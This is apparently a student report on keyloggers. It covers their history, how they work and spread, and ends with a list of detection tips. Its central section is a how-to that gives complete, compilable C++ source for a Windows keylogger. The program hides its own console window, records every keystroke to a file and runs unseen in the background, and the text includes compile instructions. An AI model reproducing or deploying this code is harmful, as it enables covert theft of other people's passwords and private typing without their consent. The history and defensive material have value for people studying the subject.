Keylogger

Topic contents

 General over of keylogger

 History of the keylogger

 How do keyloggers work?

 How hackers use keyloggers?

 How keyloggers infect devices?

 How can we make keyloggers?

 Conclusion and summary

Page | 1
General over of keylogger
What are Keyloggers?
Keyloggers are the kind of malware software that capture anything that
type with user’s keyboard. They also can take image from user’s PC desktop
then send this captured information to predefined email or FTP address. In
many cases, keylogger can spread via Network or Flash memory. Hacker use
wide range of programing language to make keylogger such as C#, VB,
Java. For detecting keyloggers many techniques have made.
It was introduced a technique for dealing with keyloggers that use a
malicious profile for detecting behavioral that similar to keyloggers
behavioral. This approach can fail because in many cases, keyloggers use a
Gmail Service as predefined Address and also use “port 587” for sending
information via email. This behavioral is very similar to email services
software such as Outlook or Firefox Sun Bird. Also, virtual keyboard is
design to deal with keylogger [5], when user use virtual keyboard, user’s
information will not enter via users’ keyboard so keyloggers cannot captured
anything but advanced keylogger can take image from PC desktop then
attacker can guess the password. Another way for dealing with keylogger
use sequence of random characters, in this technique the information that
captured by keyloggers will contain the password, but embedded in so much
random junk that discovering it is infeasible, but this method use simple
mechanism and attacker may detect password [6]. Up-to-date antivirus and
anti-adware tools can help for dealing with keyloggers greatly but we will
show that these softwares can fail against advanced keyloggers [7]. In many
case hackers use a wide range of programing language for making the
keyloggers and antivirus software’s can detect them by analysis the
behavioral of suspicious files. In generally the keyloggers can be divided
into: Detectable keyloggers and undetectable keyloggers

Page | 2
History of the keylogger
In the mid-1970s, the Soviet Union developed and deployed a hardware
keylogger targeting typewriters. Termed the "selectric bug", it measured the
movements of the print head of IBM Selectric typewriters via subtle
influences on the regional magnetic field caused by the rotation and
movements of the print head.[35] An early keylogger was written by Perry
Kivolowitz and posted to the Usenet newsgroup net. Unix-wizards, net.
Sources on November 17, 1983.[36] The posting seems to be a motivating
factor in restricting access to /dev/kmem on Unix systems. The user-mode
program operated by locating and dumping character lists (clients) as they
were assembled in the Unix kernel.

In the 1970s, spies installed keystroke loggers in the US Embassy and

Consulate buildings in Moscow.[37][38] They installed the bugs in Selectric
II and Selectric III electric typewriters.[39]

Soviet embassies used manual typewriters, rather than electric typewriters,

for classified information—apparently because they are immune to such
bugs.[39] As of 2013, Russian special services still use
typewriters.[38][40][41]

How do keyloggers work?

Keyloggers collect information and send it back to a third party – whether
that is a criminal, law enforcement or IT department. “Keyloggers are
software programs that leverage algorithms that monitor keyboard strokes
through pattern recognition and other techniques

The amount of information collected by keylogger software can vary. The

most basic forms may only collect the information typed into a single
website or application. More sophisticated ones may record everything you
type no matter the application, including information you copy and paste.
Some variants of keyloggers – especially those targeting mobile devices – go
further and record information such as calls (both call history and the audio),
information from messaging applications, GPS location, screen grabs, and
even microphone and camera capture.
Data captured by keyloggers can be sent back to attackers via email or
uploading log data to predefined websites, databases, or FTP servers.

Page | 3
How hackers use keyloggers
The first keyloggers were used by the Soviet Union in the 1970s to monitor
IBM electric typewriters used at embassies based in Moscow. They would
record what was typed and send the information back to Soviet intelligence
via radio signals.

Today spyware such as keystroke loggers are a common part of the cyber-
criminal toolset to capture financial information such as banking and credit
card details, personal information such as emails and password or names
and addresses, or sensitive business information around processes or
intellectual property. They may sell that information or use it as part of a
larger attack depending on what was gathered and their motives.

How keyloggers infect devices

Keyloggers can be placed on machines in a number of different ways.
Physical loggers require a person to be physically present to be placed on a
machine, meaning such attacks are harder (but not impossible) to achieve,
and more likely to come from an insider threat.

As with many types of malware, loggers are often included

in phishing emails containing malicious links. A new version of the HawkEye
keylogger, for example, was spread via a spam email campaign bearing
infected Word documents.

Let’s learn, how to make a C++ Keylogger:

In order to modify and compile the source, you will need a C++ IDE
(integrated development environment), for this tutorial I will use Dev c++
because it is free, lightweight, and easy to use, feel free to use any other
C++ IDE.

Download Dev c++ from here.

Install Dev c++ on your system, the installation process is very simple.
Launch it after the installation the interface should look the image below. Go
to the File option at the top you will see New from here choose Source file,
or click on the middle of the IDE and press CTRL+N.

Page | 4
Here is the source code for the C++ Keylogger:
#define _WIN32_WINNT 0x0500
#include <Windows.h>
#include <string>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
using namespace std;
void LOG(string input) {
fstream LogFile; LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << input;
LogFile.close();
}
}
bool SpecialKeys(int S_Key) {
switch (S_Key) {
case VK_SPACE: cout << " ";
LOG(" "); return true;

Page | 5
case VK_RETURN: cout << "\n";
LOG("\n"); return true;
case '¾': cout << ".";
LOG("."); return true;
case VK_SHIFT: cout << "#SHIFT#";
LOG("#SHIFT#");
return true;
case VK_BACK: cout << "\b";
LOG("\b"); return true;
case VK_RBUTTON: cout << "#R_CLICK#";
LOG("#R_CLICK#"); return true;
case VK_CAPITAL: cout << "#CAPS_LOCK#";
LOG("#CAPS_LCOK"); return true;
case VK_TAB: cout << "#TAB";
LOG("#TAB"); return true;
case VK_UP: cout << "#UP";
LOG("#UP_ARROW_KEY"); return true;
case VK_DOWN: cout << "#DOWN";
LOG("#DOWN_ARROW_KEY"); return true;
case VK_LEFT: cout << "#LEFT";
LOG("#LEFT_ARROW_KEY"); return true;
case VK_RIGHT: cout << "#RIGHT";
LOG("#RIGHT_ARROW_KEY"); return true;
case VK_CONTROL: cout << "#CONTROL";
LOG("#CONTROL"); return true;
case VK_MENU: cout << "#ALT";
LOG("#ALT"); return true;
default:
return false; }
}
int main(){
ShowWindow(GetConsoleWindow(), SW_HIDE);

Page | 6
char KEY = 'x';
while (true) {
Sleep(10); for (int KEY = 8;
KEY <= 190; KEY++) {
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}

Page | 7
Copy all of the C++ keylogger Source code, and past it on the Dev C++ ide.
To compile it go to the Execute option and choose Compile or
press F9 function key, it will ask you for a location to save your keylogger.
Choose your location and save it to start the compilation process.

After successful compilation, you will see your keylogger in executable form in the folder you
used to save during compiling the C++ keylogger source code.

Now test your keylogger start the application, you nothing because it is coded to run in the
stealth mode in the background. Open a browser and type something, and go to the C++
keylogger folder you will see a text file called dat which have the information you typed.

Page | 8
The figure below shows the data in the dat file

It will keep running in the background unless you stop it. To close the C++ keylogger go to Task
manager by pressing Ctrl+alt+Del. Select the keylogger and choose Endtask.

Page | 9
Conclusion and summary
6 best practices for detecting and removing keyloggers
1. Monitor resource allocation, processes and data

2. Keep antivirus and anti-rootkit protection up to date

3. Use anti-keylogger software

4. Consider virtual onscreen keyboards

5. Disable self-running files on external devices

6. Have a strong password policy

Page | 10